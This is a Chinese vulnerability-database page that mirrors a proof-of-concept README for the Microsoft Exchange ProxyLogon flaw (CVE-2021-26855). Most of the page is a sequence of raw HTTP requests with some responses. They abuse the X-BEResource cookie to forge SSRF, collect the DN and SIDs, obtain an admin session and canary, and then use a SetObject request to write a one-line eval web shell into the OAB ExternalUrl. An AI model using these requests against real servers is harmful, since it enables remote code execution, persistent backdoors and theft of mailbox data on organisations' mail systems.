漏洞平台

POC详情： 6d07a9e05dcffa4cb18e279d96c5384c9164b0b9

来源

https://github.com/ShyTangerine/cve-2021-26855

关联漏洞

标题： Microsoft Exchange Server 代码问题漏洞 (CVE-2021-26855)
描述：Microsoft Exchange Server是美国微软（Microsoft）公司的一套电子邮件服务程序。它提供邮件存取、储存、转发，语音邮件，邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求，并通过Exchange Server进行身份验证。进而扫描内网，获取用户敏感信息。以下产品和版本受到影响：Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange

介绍

# cve-2021-26855

```
GET /ecp/x.png HTTP/1.1
Host: 192.168.170.134
Cookie: X-BEResource=localhost~1942062522
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?10
Te: trailers
Connection: close
```

```
# 获取DN值

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?; X-BEResource=EXCHANGE01/autodiscover/autodiscover.xml?a=~1942062522
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Content-Type: text/xml
Content-Length: 343
Connection: close

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>lili@xihongdream.com</EMailAddress>
                <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>



/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili
```

```
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
X-Requesttype: Connect
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/mapi-http
Content-Length: 142
Connection: close

/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili


S-1-5-21-2706396224-3788800485-1262849735-3585
```


```
# 获取Session，msExchEcpCanary

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 83
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-3585</s></r>


ASP.NET_SessionId=c897b0d2-4bc1-40ce-a449-9d65d43276e9;
msExchEcpCanary=jwpquzNMEEyRaXH6LhHEJBqGxCzwG9sIO7BTgjy0e4DxjF0s6fVmLcP-InroQca6cPxscclNbS0.;

-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-500</s></r>


-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln="john"><s>S-1-5-21-2706396224-3788800485-1262849735-5529</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
```

```
# 获取OAB id

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":  
    {"Parameters":  
        {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "OAB"  
        }  
    }  
}


-----------------------------------

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":  
    {"Parameters":  
        {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "OAB"  
        }  
    }  
}

----------------------------

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{  
    "filter": {  
        "Parameters": {  
            "__type":  
            "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "All"  
        }  
    },  
    "sort": {}  
}
```

```
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1941962754; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{  
    "identity": {  
        "__type": "Identity:ECP",  
        "DisplayName": "OAB (Default Web Site)",  
        "RawIdentity": oabid  
    },  
    "properties": {  
        "Parameters": {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "ExternalUrl": f"http://x/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["api"],"unsafe");}</script>"  
        }  
    }  
}
```

文件快照


 [4.0K]  /data/pocs/6d07a9e05dcffa4cb18e279d96c5384c9164b0b9
└── [7.0K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。